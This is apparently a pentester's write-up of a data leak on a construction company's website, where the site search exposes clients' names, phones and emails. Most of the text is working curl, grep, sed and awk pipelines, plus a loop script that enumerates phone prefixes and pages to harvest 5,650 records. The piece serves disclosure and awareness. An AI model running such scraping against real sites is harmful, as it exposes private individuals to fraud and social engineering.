Data leaks without hacking

Sometimes there is no need to break into a system to obtain personal or other private information. When web-site owners or system administrators have not configured policies and rules properly, anyone can gain privileged access or read restricted data without authorization. Most importantly, such information is publicly available, so hackers may not be punished at all for anything they do with it (at least under Russian law). In this article I will walk through one of my recent pentests, of a construction company, and the issues I was able to reveal.

Reconnaissance

The pentest target is a web-site built on the 1C-Bitrix CMS and served by the nginx web server. According to the whois output, the site is hosted by a Russian public web-hosting provider. I assume it runs on a simple VPS (virtual private server), because there is no need for a high-performance system behind a simple informational site.

Let’s look at the web-site and try to find any useful information.

I updated the /etc/hosts file, so the construction company's web-site is now reachable at the www.victim.host address.

https://www.victim.host

At first glance there are a couple of places where we can interact with the site: an auth form and a search field. The latter is the better target, because it should not send any alerts to the administrator, whereas entering wrong passwords might.

https://www.victim.host/search/?q=search+field

Find the right payload

Within several minutes I found an interesting request. If I enter an email pattern, for instance @gmail.com, the system shows me the client's full name, cell phone number and email.

https://www.victim.host/search/index.php?tags=&how=r&q=%40gmail&PAGEN_2=1

Can you imagine? You can harvest all the sensitive and personal information just by making the right query. Ok, what's next?

Further investigation revealed a limit of 500 results per request. How can we get around that limit?

As you may know, Russian mobile phone number prefixes run from 8(901) to 8(999). So we have a pool from 8(901)000-00-01 to 8(999)999-99-99. What if we search by the phone prefix?

https://www.victim.host/search/index.php?tags=&how=r&q=8903

Nice 🙂 But, as you can see, 8903 alone still returns 500 results. To get all the data, we can narrow the query by adding the next digit: 89030, 89031, 89032 and so on. Nevertheless, queries of this kind are quite enough for our Proof of Concept.
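The narrowing step can be sketched as a small helper that expands one prefix into its ten longer variants. This is only an illustration: the function name narrow_prefix is hypothetical and does not come from the original script.

```shell
#!/usr/bin/env bash
# narrow_prefix: print the ten prefixes that are one digit longer
# than the given one (hypothetical helper, for illustration only).
narrow_prefix() {
    local prefix="$1"
    local digit
    for digit in 0 1 2 3 4 5 6 7 8 9; do
        printf '%s%s\n' "$prefix" "$digit"
    done
}

# Expand the saturated prefix 8903 into 89030 ... 89039.
narrow_prefix 8903
```

If one of the longer prefixes still hits the 500-result limit, the same helper can be applied to it again.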

Proof of Concept

3.1 Get the info

Ok, let's dig deeper and try to understand the output by looking at the page source.

view-source:https://www.victim.host/search/?q=8903

We got 3 lines: the full name, the phone (with my search query wrapped in HTML bold tags) and the email. Each result starts with the search-preview class name. Let's use search-preview as a starting point.

curl -s "https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1" | grep -i "search-preview" -A 2

It works, but there is plenty of trash. Let's clean it up a little. We have to delete the HTML bold tags, replace each new line and tab with a comma (,) and replace each -- with a new line.

curl -s "https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1" | grep -i "search-preview" -A 2 | tr '\n\r\t' ',' | sed -z 's/--/\n/g' | sed 's/<b>//g' | sed 's/<\/b>//g'
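The separator that gets turned into a new line is produced by grep itself: with -A, it prints a line containing -- between non-adjacent groups of output. A minimal offline sketch of that behaviour follows. The HTML sample is made up for illustration and is not the real markup of the site; sample_html is a hypothetical helper.

```shell
#!/usr/bin/env bash
# sample_html: print a made-up page fragment with two result blocks
# separated by unrelated markup (assumption, not the real page source).
sample_html() {
    cat <<'EOF'
<div class="search-preview">Ivan Ivanov
<b>8903</b>0000000
ivan@example.com
<hr>
<p>unrelated</p>
<div class="search-preview">Petr Petrov
<b>8903</b>1111111
petr@example.com
EOF
}

# Each match is printed with its 2 trailing lines; because the two
# groups are not adjacent, grep puts a "--" line between them.
sample_html | grep -i "search-preview" -A 2
```

That lone -- line is what makes it possible to flatten everything with tr and then split the stream back into one record per line.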

A little bit more: collapse the runs of commas and replace the remaining < and > characters.

curl -s "https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1" | grep -i "search-preview" -A 2 | tr '\n\r\t' ',' | sed -z 's/--/\n/g' | sed 's/<b>//g' | sed 's/<\/b>//g' | sed 's/,,,,,,,,/,/g' | sed 's/,,/,/g' | tr '><' ','

All that remains is to output the data in the right format. AWK will help us.

curl -s "https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1" | grep -i "search-preview" -A 2 | tr '\n\r\t' ',' | sed -z 's/--/\n/g' | sed 's/<b>//g' | sed 's/<\/b>//g' | sed 's/,,,,,,,,/,/g' | sed 's/,,/,/g' | tr '><' ',' | awk -F',' '{print $4 "|" $5 "|" $6}'

Excellent. We got clean, formatted output. Let's go further.

3.2 Pagination
The next issue we have to solve is pagination. What is the problem? All 500 results are split into pages of 10 results each. So we have to harvest the first 10 lines, then move to page 2 and harvest the next 10 lines, and so on. But how do we know how many pages there are?

https://www.victim.host/search/?q=8903&PAGEN_2=5

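In this particular situation there are 2 possible ways, and I suggest the following one. We just have to divide the total number of results (for instance, 500) by 10 (results per page) and add 1, so that a partially filled last page is not missed. The total is taken from the line of the results page that contains the word "Найдено" ("Found").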

curl -s "https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1" | grep -i "Найдено" | grep -o "[0-9]*"

let pages=$(curl -s "https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1" | grep -i "Найдено" | grep -o "[0-9]*")/10+1; echo $pages;
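The arithmetic can be checked offline. The sketch below compares the formula used in the article with plain ceiling division, which is an alternative and not the author's method. Both function names are hypothetical.

```shell
#!/usr/bin/env bash
# pages_article: the formula from the article, total / per_page + 1.
pages_article() {
    echo $(( $1 / $2 + 1 ))
}

# pages_ceil: ceiling division, an alternative that avoids requesting
# an extra page when the total is an exact multiple of the page size.
pages_ceil() {
    echo $(( ($1 + $2 - 1) / $2 ))
}

pages_article 500 10   # prints 51
pages_ceil 500 10      # prints 50
pages_article 493 10   # prints 50
pages_ceil 493 10      # prints 50
```

With the article's formula an exact multiple such as 500 yields one page more than needed, which only costs one extra request, so either variant works for the loop.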

3.3 Full script
The last thing to do is to combine our lines into a neat script. We declare the victim web-site and the set of phone prefixes, and make 2 loops: one over the phone prefixes and one over the pages. All the harvested data is written to the info.txt text file.
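The structure of the two loops can be sketched as a dry run that only prints the URLs and sends no requests. This is not the original get-information.sh: the prefix list, the fixed page count and the function name build_urls are assumptions made for illustration.

```shell
#!/usr/bin/env bash
victim="victim.host"     # placeholder host used throughout the article
prefixes="8903 8905"     # assumption: a short illustrative prefix list
pages=3                  # assumption: normally computed from the result count

# build_urls: outer loop over phone prefixes, inner loop over pages.
# It prints one search URL per line and performs no network access.
build_urls() {
    local prefix page
    for prefix in $prefixes; do
        page=1
        while [ "$page" -le "$pages" ]; do
            printf 'https://www.%s/search/index.php?tags=&how=r&q=%s&PAGEN_2=%s\n' \
                "$victim" "$prefix" "$page"
            page=$(( page + 1 ))
        done
    done
}

build_urls
```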

Now the time has come to launch the script.

bash get-information.sh

It took 27 minutes to run the whole script and collect the information. As you can see, the script found personal information for 5650 Russian citizens, including first and last names, email and phone number.

echo ; wc -l info.txt ; echo ; head info.txt

Conclusion
That kind of information is quite enough for a follow-up social engineering attack, password brute-force and reuse attacks and, of course, fraud.
Generally speaking, a small misconfiguration leads to a huge issue for the company and for more than 5,000 people.
Please be careful.

Ivan Glinkin